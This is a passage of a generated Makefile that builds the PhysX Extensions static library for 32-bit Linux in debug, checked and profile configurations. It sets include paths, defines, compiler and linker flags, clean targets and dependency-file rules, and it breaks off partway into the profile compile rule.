PhysXExtensions_c_release_dep      = $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.P, $(PhysXExtensions_cfiles)))))
PhysXExtensions_release_dep      = $(PhysXExtensions_cpp_release_dep) $(PhysXExtensions_cc_release_dep) $(PhysXExtensions_c_release_dep)
-include $(PhysXExtensions_release_dep)
# --- debug configuration: include paths ------------------------------------
PhysXExtensions_debug_hpaths    :=
PhysXExtensions_debug_hpaths    += ./../../Common/include
PhysXExtensions_debug_hpaths    += ./../../../../PxShared/include
PhysXExtensions_debug_hpaths    += ./../../../../PxShared/src/foundation/include
PhysXExtensions_debug_hpaths    += ./../../../../PxShared/src/fastxml/include
PhysXExtensions_debug_hpaths    += ./../../../../PxShared/src/pvd/include
PhysXExtensions_debug_hpaths    += ./../../../Include/common
PhysXExtensions_debug_hpaths    += ./../../../Include/geometry
PhysXExtensions_debug_hpaths    += ./../../../Include/GeomUtils
PhysXExtensions_debug_hpaths    += ./../../../Include/pvd
PhysXExtensions_debug_hpaths    += ./../../../Include/cooking
PhysXExtensions_debug_hpaths    += ./../../../Include/extensions
PhysXExtensions_debug_hpaths    += ./../../../Include/vehicle
PhysXExtensions_debug_hpaths    += ./../../../Include/cloth
PhysXExtensions_debug_hpaths    += ./../../../Include
PhysXExtensions_debug_hpaths    += ./../../Common/src
PhysXExtensions_debug_hpaths    += ./../../GeomUtils/headers
PhysXExtensions_debug_hpaths    += ./../../GeomUtils/src
PhysXExtensions_debug_hpaths    += ./../../GeomUtils/src/contact
PhysXExtensions_debug_hpaths    += ./../../GeomUtils/src/common
PhysXExtensions_debug_hpaths    += ./../../GeomUtils/src/convex
PhysXExtensions_debug_hpaths    += ./../../GeomUtils/src/distance
PhysXExtensions_debug_hpaths    += ./../../GeomUtils/src/gjk
PhysXExtensions_debug_hpaths    += ./../../GeomUtils/src/intersection
PhysXExtensions_debug_hpaths    += ./../../GeomUtils/src/mesh
PhysXExtensions_debug_hpaths    += ./../../GeomUtils/src/hf
PhysXExtensions_debug_hpaths    += ./../../GeomUtils/src/pcm
PhysXExtensions_debug_hpaths    += ./../../PhysXMetaData/core/include
PhysXExtensions_debug_hpaths    += ./../../PhysXMetaData/extensions/include
PhysXExtensions_debug_hpaths    += ./../../PhysXExtensions/src
PhysXExtensions_debug_hpaths    += ./../../PhysXExtensions/src/serialization/Xml
PhysXExtensions_debug_hpaths    += ./../../PhysXExtensions/src/serialization/Binary
PhysXExtensions_debug_hpaths    += ./../../PhysXExtensions/src/serialization/File
PhysXExtensions_debug_hpaths    += ./../../PvdSDK/src
PhysXExtensions_debug_hpaths    += ./../../PhysX/src
# --- debug configuration: library paths, defines, libraries -----------------
PhysXExtensions_debug_lpaths    :=
PhysXExtensions_debug_lpaths    += ./../../../../PxShared/lib/linux32
PhysXExtensions_debug_defines   := $(PhysXExtensions_custom_defines)
PhysXExtensions_debug_defines   += PX_BUILD_NUMBER=0
PhysXExtensions_debug_defines   += PX_PHYSX_STATIC_LIB
PhysXExtensions_debug_defines   += _DEBUG
PhysXExtensions_debug_defines   += PX_DEBUG=1
PhysXExtensions_debug_defines   += PX_CHECKED=1
PhysXExtensions_debug_defines   += PX_SUPPORT_PVD=1
PhysXExtensions_debug_libraries :=
PhysXExtensions_debug_libraries += PsFastXmlDEBUG
# --- debug configuration: compiler / linker flags ---------------------------
PhysXExtensions_debug_common_cflags	:= $(PhysXExtensions_custom_cflags)
PhysXExtensions_debug_common_cflags	+= -MMD
PhysXExtensions_debug_common_cflags	+= $(addprefix -D, $(PhysXExtensions_debug_defines))
PhysXExtensions_debug_common_cflags	+= $(addprefix -I, $(PhysXExtensions_debug_hpaths))
PhysXExtensions_debug_common_cflags	+= -m32
PhysXExtensions_debug_common_cflags  += -Werror -m32 -fPIC -msse2 -mfpmath=sse -malign-double -fno-exceptions -fno-rtti -fvisibility=hidden -fvisibility-inlines-hidden
PhysXExtensions_debug_common_cflags  += -Wall -Wextra -Wstrict-aliasing=2 -fdiagnostics-show-option
PhysXExtensions_debug_common_cflags  += -Wno-invalid-offsetof -Wno-uninitialized -Wno-implicit-fallthrough
PhysXExtensions_debug_common_cflags  += -Wno-missing-field-initializers
PhysXExtensions_debug_common_cflags  += -g3 -gdwarf-2
PhysXExtensions_debug_cflags	:= $(PhysXExtensions_debug_common_cflags)
PhysXExtensions_debug_cppflags	:= $(PhysXExtensions_debug_common_cflags)
PhysXExtensions_debug_lflags    := $(PhysXExtensions_custom_lflags)
PhysXExtensions_debug_lflags    += $(addprefix -L, $(PhysXExtensions_debug_lpaths))
PhysXExtensions_debug_lflags    += -Wl,--start-group $(addprefix -l, $(PhysXExtensions_debug_libraries)) -Wl,--end-group
PhysXExtensions_debug_lflags  += -lrt
PhysXExtensions_debug_lflags  += -m32
# --- debug configuration: object lists and output archive -------------------
PhysXExtensions_debug_objsdir  = $(OBJS_DIR)/PhysXExtensions_debug
PhysXExtensions_debug_cpp_o    = $(addprefix $(PhysXExtensions_debug_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.o, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_debug_cc_o    = $(addprefix $(PhysXExtensions_debug_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.o, $(PhysXExtensions_ccfiles)))))
PhysXExtensions_debug_c_o      = $(addprefix $(PhysXExtensions_debug_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.o, $(PhysXExtensions_cfiles)))))
PhysXExtensions_debug_obj      = $(PhysXExtensions_debug_cpp_o) $(PhysXExtensions_debug_cc_o) $(PhysXExtensions_debug_c_o)
PhysXExtensions_debug_bin      := ./../../../Lib/linux32/libPhysX3ExtensionsDEBUG.a
# Remove the debug objects, archive, and dependency files.
clean_PhysXExtensions_debug:
	@$(ECHO) clean PhysXExtensions debug
	@$(RMDIR) $(PhysXExtensions_debug_objsdir)
	@$(RMDIR) $(PhysXExtensions_debug_bin)
	@$(RMDIR) $(DEPSDIR)/PhysXExtensions/debug
# pre/main/post build phases chained so custom hooks can attach to them.
build_PhysXExtensions_debug: postbuild_PhysXExtensions_debug
postbuild_PhysXExtensions_debug: mainbuild_PhysXExtensions_debug
mainbuild_PhysXExtensions_debug: prebuild_PhysXExtensions_debug $(PhysXExtensions_debug_bin)
prebuild_PhysXExtensions_debug:
# Archive all debug objects into the static library (PsFastXml built first).
$(PhysXExtensions_debug_bin): $(PhysXExtensions_debug_obj) build_PsFastXml_debug
	mkdir -p `dirname ./../../../Lib/linux32/libPhysX3ExtensionsDEBUG.a`
	@$(AR) rcs $(PhysXExtensions_debug_bin) $(PhysXExtensions_debug_obj)
	$(ECHO) building $@ complete!
PhysXExtensions_debug_DEPDIR = $(dir $(@))/$(*F)
# Compile each .cpp to its object; the recipe then post-processes the
# compiler-emitted .d file into a .P dependency file (with phony targets
# for each header) under $(DEPSDIR)/PhysXExtensions/debug.
$(PhysXExtensions_debug_cpp_o): $(PhysXExtensions_debug_objsdir)/%.o:
	$(ECHO) PhysXExtensions: compiling debug $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cppfiles))...
	mkdir -p $(dir $(@))
	$(CXX) $(PhysXExtensions_debug_cppflags) -c $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cppfiles)) -o $@
	@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cppfiles))))))
	cp $(PhysXExtensions_debug_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
	  sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
	    -e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_debug_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
	  rm -f $(PhysXExtensions_debug_DEPDIR).d
# Same pattern for .cc sources (dependency files go under $(DEPSDIR) root).
$(PhysXExtensions_debug_cc_o): $(PhysXExtensions_debug_objsdir)/%.o:
	$(ECHO) PhysXExtensions: compiling debug $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_ccfiles))...
	mkdir -p $(dir $(@))
	$(CXX) $(PhysXExtensions_debug_cppflags) -c $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_ccfiles)) -o $@
	mkdir -p $(dir $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_ccfiles))))))
	cp $(PhysXExtensions_debug_DEPDIR).d $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).debug.P; \
	  sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
	    -e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_debug_DEPDIR).d >> $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).debug.P; \
	  rm -f $(PhysXExtensions_debug_DEPDIR).d
$(PhysXExtensions_debug_c_o): $(PhysXExtensions_debug_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling debug $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cfiles))...
mkdir -p $(dir $(@))
$(CC) $(PhysXExtensions_debug_cflags) -c $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cfiles)) -o $@
@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cfiles))))))
cp $(PhysXExtensions_debug_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_debug_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/debug/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_debug_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
rm -f $(PhysXExtensions_debug_DEPDIR).d
# ---------------------------------------------------------------------------
# PhysXExtensions "checked" configuration: optimized (NDEBUG, -O3) build with
# PX_CHECKED=1 runtime validation enabled.  Same generated per-config pattern
# as the debug section above.
# ---------------------------------------------------------------------------
# Header search paths for this configuration.
PhysXExtensions_checked_hpaths :=
PhysXExtensions_checked_hpaths += ./../../Common/include
PhysXExtensions_checked_hpaths += ./../../../../PxShared/include
PhysXExtensions_checked_hpaths += ./../../../../PxShared/src/foundation/include
PhysXExtensions_checked_hpaths += ./../../../../PxShared/src/fastxml/include
PhysXExtensions_checked_hpaths += ./../../../../PxShared/src/pvd/include
PhysXExtensions_checked_hpaths += ./../../../Include/common
PhysXExtensions_checked_hpaths += ./../../../Include/geometry
PhysXExtensions_checked_hpaths += ./../../../Include/GeomUtils
PhysXExtensions_checked_hpaths += ./../../../Include/pvd
PhysXExtensions_checked_hpaths += ./../../../Include/cooking
PhysXExtensions_checked_hpaths += ./../../../Include/extensions
PhysXExtensions_checked_hpaths += ./../../../Include/vehicle
PhysXExtensions_checked_hpaths += ./../../../Include/cloth
PhysXExtensions_checked_hpaths += ./../../../Include
PhysXExtensions_checked_hpaths += ./../../Common/src
PhysXExtensions_checked_hpaths += ./../../GeomUtils/headers
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/contact
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/common
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/convex
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/distance
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/gjk
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/intersection
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/mesh
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/hf
PhysXExtensions_checked_hpaths += ./../../GeomUtils/src/pcm
PhysXExtensions_checked_hpaths += ./../../PhysXMetaData/core/include
PhysXExtensions_checked_hpaths += ./../../PhysXMetaData/extensions/include
PhysXExtensions_checked_hpaths += ./../../PhysXExtensions/src
PhysXExtensions_checked_hpaths += ./../../PhysXExtensions/src/serialization/Xml
PhysXExtensions_checked_hpaths += ./../../PhysXExtensions/src/serialization/Binary
PhysXExtensions_checked_hpaths += ./../../PhysXExtensions/src/serialization/File
PhysXExtensions_checked_hpaths += ./../../PvdSDK/src
PhysXExtensions_checked_hpaths += ./../../PhysX/src
# Library search paths.
PhysXExtensions_checked_lpaths :=
PhysXExtensions_checked_lpaths += ./../../../../PxShared/lib/linux32
# Preprocessor defines; PX_CHECKED=1 is what distinguishes this config.
PhysXExtensions_checked_defines := $(PhysXExtensions_custom_defines)
PhysXExtensions_checked_defines += PX_BUILD_NUMBER=0
PhysXExtensions_checked_defines += PX_PHYSX_STATIC_LIB
PhysXExtensions_checked_defines += NDEBUG
PhysXExtensions_checked_defines += PX_CHECKED=1
PhysXExtensions_checked_defines += PX_SUPPORT_PVD=1
# Libraries to link (CHECKED flavour of PsFastXml).
PhysXExtensions_checked_libraries :=
PhysXExtensions_checked_libraries += PsFastXmlCHECKED
# Compiler flags shared by the C and C++ compiles of this config.
PhysXExtensions_checked_common_cflags := $(PhysXExtensions_custom_cflags)
PhysXExtensions_checked_common_cflags += -MMD
PhysXExtensions_checked_common_cflags += $(addprefix -D, $(PhysXExtensions_checked_defines))
PhysXExtensions_checked_common_cflags += $(addprefix -I, $(PhysXExtensions_checked_hpaths))
PhysXExtensions_checked_common_cflags += -m32
PhysXExtensions_checked_common_cflags += -Werror -m32 -fPIC -msse2 -mfpmath=sse -malign-double -fno-exceptions -fno-rtti -fvisibility=hidden -fvisibility-inlines-hidden
PhysXExtensions_checked_common_cflags += -Wall -Wextra -Wstrict-aliasing=2 -fdiagnostics-show-option
PhysXExtensions_checked_common_cflags += -Wno-invalid-offsetof -Wno-uninitialized -Wno-implicit-fallthrough
PhysXExtensions_checked_common_cflags += -Wno-missing-field-initializers
PhysXExtensions_checked_common_cflags += -g3 -gdwarf-2 -O3 -fno-strict-aliasing
PhysXExtensions_checked_cflags := $(PhysXExtensions_checked_common_cflags)
PhysXExtensions_checked_cppflags := $(PhysXExtensions_checked_common_cflags)
# Linker flags (32-bit link, grouped libs, librt).
PhysXExtensions_checked_lflags := $(PhysXExtensions_custom_lflags)
PhysXExtensions_checked_lflags += $(addprefix -L, $(PhysXExtensions_checked_lpaths))
PhysXExtensions_checked_lflags += -Wl,--start-group $(addprefix -l, $(PhysXExtensions_checked_libraries)) -Wl,--end-group
PhysXExtensions_checked_lflags += -lrt
PhysXExtensions_checked_lflags += -m32
# Object directory and per-suffix object lists mirrored from the source tree.
PhysXExtensions_checked_objsdir = $(OBJS_DIR)/PhysXExtensions_checked
PhysXExtensions_checked_cpp_o = $(addprefix $(PhysXExtensions_checked_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.o, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_checked_cc_o = $(addprefix $(PhysXExtensions_checked_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.o, $(PhysXExtensions_ccfiles)))))
PhysXExtensions_checked_c_o = $(addprefix $(PhysXExtensions_checked_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.o, $(PhysXExtensions_cfiles)))))
PhysXExtensions_checked_obj = $(PhysXExtensions_checked_cpp_o) $(PhysXExtensions_checked_cc_o) $(PhysXExtensions_checked_c_o)
# Static library produced by this configuration.
PhysXExtensions_checked_bin := ./../../../Lib/linux32/libPhysX3ExtensionsCHECKED.a
# Remove the objects, the archive and the dependency files for this config.
clean_PhysXExtensions_checked:
@$(ECHO) clean PhysXExtensions checked
@$(RMDIR) $(PhysXExtensions_checked_objsdir)
@$(RMDIR) $(PhysXExtensions_checked_bin)
@$(RMDIR) $(DEPSDIR)/PhysXExtensions/checked
# Build phase chain: build -> postbuild -> mainbuild -> (prebuild, archive).
build_PhysXExtensions_checked: postbuild_PhysXExtensions_checked
postbuild_PhysXExtensions_checked: mainbuild_PhysXExtensions_checked
mainbuild_PhysXExtensions_checked: prebuild_PhysXExtensions_checked $(PhysXExtensions_checked_bin)
prebuild_PhysXExtensions_checked:
# Archive every object into the static library (requires PsFastXml checked).
$(PhysXExtensions_checked_bin): $(PhysXExtensions_checked_obj) build_PsFastXml_checked
mkdir -p `dirname ./../../../Lib/linux32/libPhysX3ExtensionsCHECKED.a`
@$(AR) rcs $(PhysXExtensions_checked_bin) $(PhysXExtensions_checked_obj)
$(ECHO) building $@ complete!
# Per-object dependency-file location ($(*F) is the stem of the matched target).
PhysXExtensions_checked_DEPDIR = $(dir $(@))/$(*F)
# Compile rules: recover each source path from its object path, compile, then
# rewrite the compiler's .d into a .P with empty per-header rules.
$(PhysXExtensions_checked_cpp_o): $(PhysXExtensions_checked_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling checked $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cppfiles))...
mkdir -p $(dir $(@))
$(CXX) $(PhysXExtensions_checked_cppflags) -c $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cppfiles)) -o $@
@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cppfiles))))))
cp $(PhysXExtensions_checked_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_checked_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
rm -f $(PhysXExtensions_checked_DEPDIR).d
# NOTE(review): the .cc rule stores .P files directly under $(DEPSDIR) with a
# .checked.P suffix, unlike the .cpp/.c rules; generator quirk.
$(PhysXExtensions_checked_cc_o): $(PhysXExtensions_checked_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling checked $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_ccfiles))...
mkdir -p $(dir $(@))
$(CXX) $(PhysXExtensions_checked_cppflags) -c $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_ccfiles)) -o $@
mkdir -p $(dir $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_ccfiles))))))
cp $(PhysXExtensions_checked_DEPDIR).d $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).checked.P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_checked_DEPDIR).d >> $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).checked.P; \
rm -f $(PhysXExtensions_checked_DEPDIR).d
$(PhysXExtensions_checked_c_o): $(PhysXExtensions_checked_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling checked $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cfiles))...
mkdir -p $(dir $(@))
$(CC) $(PhysXExtensions_checked_cflags) -c $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cfiles)) -o $@
@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cfiles))))))
cp $(PhysXExtensions_checked_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_checked_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/checked/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_checked_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
rm -f $(PhysXExtensions_checked_DEPDIR).d
# ---------------------------------------------------------------------------
# PhysXExtensions "profile" configuration: optimized (NDEBUG, -O3, no debug
# info) build with PX_PROFILE=1 instrumentation enabled.  Same generated
# per-config pattern as the sections above.
# ---------------------------------------------------------------------------
# Header search paths for this configuration.
PhysXExtensions_profile_hpaths :=
PhysXExtensions_profile_hpaths += ./../../Common/include
PhysXExtensions_profile_hpaths += ./../../../../PxShared/include
PhysXExtensions_profile_hpaths += ./../../../../PxShared/src/foundation/include
PhysXExtensions_profile_hpaths += ./../../../../PxShared/src/fastxml/include
PhysXExtensions_profile_hpaths += ./../../../../PxShared/src/pvd/include
PhysXExtensions_profile_hpaths += ./../../../Include/common
PhysXExtensions_profile_hpaths += ./../../../Include/geometry
PhysXExtensions_profile_hpaths += ./../../../Include/GeomUtils
PhysXExtensions_profile_hpaths += ./../../../Include/pvd
PhysXExtensions_profile_hpaths += ./../../../Include/cooking
PhysXExtensions_profile_hpaths += ./../../../Include/extensions
PhysXExtensions_profile_hpaths += ./../../../Include/vehicle
PhysXExtensions_profile_hpaths += ./../../../Include/cloth
PhysXExtensions_profile_hpaths += ./../../../Include
PhysXExtensions_profile_hpaths += ./../../Common/src
PhysXExtensions_profile_hpaths += ./../../GeomUtils/headers
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/contact
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/common
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/convex
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/distance
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/gjk
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/intersection
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/mesh
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/hf
PhysXExtensions_profile_hpaths += ./../../GeomUtils/src/pcm
PhysXExtensions_profile_hpaths += ./../../PhysXMetaData/core/include
PhysXExtensions_profile_hpaths += ./../../PhysXMetaData/extensions/include
PhysXExtensions_profile_hpaths += ./../../PhysXExtensions/src
PhysXExtensions_profile_hpaths += ./../../PhysXExtensions/src/serialization/Xml
PhysXExtensions_profile_hpaths += ./../../PhysXExtensions/src/serialization/Binary
PhysXExtensions_profile_hpaths += ./../../PhysXExtensions/src/serialization/File
PhysXExtensions_profile_hpaths += ./../../PvdSDK/src
PhysXExtensions_profile_hpaths += ./../../PhysX/src
# Library search paths.
PhysXExtensions_profile_lpaths :=
PhysXExtensions_profile_lpaths += ./../../../../PxShared/lib/linux32
# Preprocessor defines; PX_PROFILE=1 is what distinguishes this config.
PhysXExtensions_profile_defines := $(PhysXExtensions_custom_defines)
PhysXExtensions_profile_defines += PX_BUILD_NUMBER=0
PhysXExtensions_profile_defines += PX_PHYSX_STATIC_LIB
PhysXExtensions_profile_defines += NDEBUG
PhysXExtensions_profile_defines += PX_PROFILE=1
PhysXExtensions_profile_defines += PX_SUPPORT_PVD=1
# Libraries to link (PROFILE flavour of PsFastXml).
PhysXExtensions_profile_libraries :=
PhysXExtensions_profile_libraries += PsFastXmlPROFILE
# Compiler flags shared by the C and C++ compiles of this config.
PhysXExtensions_profile_common_cflags := $(PhysXExtensions_custom_cflags)
PhysXExtensions_profile_common_cflags += -MMD
PhysXExtensions_profile_common_cflags += $(addprefix -D, $(PhysXExtensions_profile_defines))
PhysXExtensions_profile_common_cflags += $(addprefix -I, $(PhysXExtensions_profile_hpaths))
PhysXExtensions_profile_common_cflags += -m32
PhysXExtensions_profile_common_cflags += -Werror -m32 -fPIC -msse2 -mfpmath=sse -malign-double -fno-exceptions -fno-rtti -fvisibility=hidden -fvisibility-inlines-hidden
PhysXExtensions_profile_common_cflags += -Wall -Wextra -Wstrict-aliasing=2 -fdiagnostics-show-option
PhysXExtensions_profile_common_cflags += -Wno-invalid-offsetof -Wno-uninitialized -Wno-implicit-fallthrough
PhysXExtensions_profile_common_cflags += -Wno-missing-field-initializers
PhysXExtensions_profile_common_cflags += -O3 -fno-strict-aliasing
PhysXExtensions_profile_cflags := $(PhysXExtensions_profile_common_cflags)
PhysXExtensions_profile_cppflags := $(PhysXExtensions_profile_common_cflags)
# Linker flags (32-bit link, grouped libs, librt).
PhysXExtensions_profile_lflags := $(PhysXExtensions_custom_lflags)
PhysXExtensions_profile_lflags += $(addprefix -L, $(PhysXExtensions_profile_lpaths))
PhysXExtensions_profile_lflags += -Wl,--start-group $(addprefix -l, $(PhysXExtensions_profile_libraries)) -Wl,--end-group
PhysXExtensions_profile_lflags += -lrt
PhysXExtensions_profile_lflags += -m32
# Object directory and per-suffix object lists mirrored from the source tree.
PhysXExtensions_profile_objsdir = $(OBJS_DIR)/PhysXExtensions_profile
PhysXExtensions_profile_cpp_o = $(addprefix $(PhysXExtensions_profile_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.o, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_profile_cc_o = $(addprefix $(PhysXExtensions_profile_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.o, $(PhysXExtensions_ccfiles)))))
PhysXExtensions_profile_c_o = $(addprefix $(PhysXExtensions_profile_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.o, $(PhysXExtensions_cfiles)))))
PhysXExtensions_profile_obj = $(PhysXExtensions_profile_cpp_o) $(PhysXExtensions_profile_cc_o) $(PhysXExtensions_profile_c_o)
# Static library produced by this configuration.
PhysXExtensions_profile_bin := ./../../../Lib/linux32/libPhysX3ExtensionsPROFILE.a
# Remove the objects, the archive and the dependency files for this config.
clean_PhysXExtensions_profile:
@$(ECHO) clean PhysXExtensions profile
@$(RMDIR) $(PhysXExtensions_profile_objsdir)
@$(RMDIR) $(PhysXExtensions_profile_bin)
@$(RMDIR) $(DEPSDIR)/PhysXExtensions/profile
# Build phase chain: build -> postbuild -> mainbuild -> (prebuild, archive).
build_PhysXExtensions_profile: postbuild_PhysXExtensions_profile
postbuild_PhysXExtensions_profile: mainbuild_PhysXExtensions_profile
mainbuild_PhysXExtensions_profile: prebuild_PhysXExtensions_profile $(PhysXExtensions_profile_bin)
prebuild_PhysXExtensions_profile:
# Archive every object into the static library (requires PsFastXml profile).
$(PhysXExtensions_profile_bin): $(PhysXExtensions_profile_obj) build_PsFastXml_profile
mkdir -p `dirname ./../../../Lib/linux32/libPhysX3ExtensionsPROFILE.a`
@$(AR) rcs $(PhysXExtensions_profile_bin) $(PhysXExtensions_profile_obj)
$(ECHO) building $@ complete!
# Per-object dependency-file location ($(*F) is the stem of the matched target).
PhysXExtensions_profile_DEPDIR = $(dir $(@))/$(*F)
# Compile rules: recover each source path from its object path, compile, then
# rewrite the compiler's .d into a .P with empty per-header rules.
$(PhysXExtensions_profile_cpp_o): $(PhysXExtensions_profile_objsdir)/%.o:
